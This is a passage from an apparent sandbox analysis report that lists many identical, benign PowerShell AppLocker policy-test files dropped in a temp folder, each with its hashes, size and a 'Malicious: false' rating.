SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jpyuw2nj.3gt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfzua3c2.pfi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqmw1l0k.yet.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1gs3yg5.x5k.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_le2fmz1x.wef.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lh5uoq2d.p2e.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhcsycg0.jgc.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljshzb0j.gxw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_loenx3kg.mkr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lorwrnzg.ctu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lss2b4c4.yqm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mxl42awo.yff.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njz0l0il.q1j.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_orme3nc1.kfu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phsm4h0l.lby.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pvrdahlh.zyp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_py0ubpfd.3l0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qeosimku.nkf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvkaulvf.kpb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qydbaibc.hz3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rimpemly.emi.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s2hqzjhb.lev.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sobxurkh.tmh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tbrwcx2i.uc0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tvsplurw.3uz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tyhihbuc.ub1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ub03xtu5.n3u.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufoa22ep.h14.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v0neu2sq.blv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ve5z1d2c.12o.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnjflhkg.jls.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vzt30vpo.icf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xducbypa.0nb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yi40oye3.gzi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
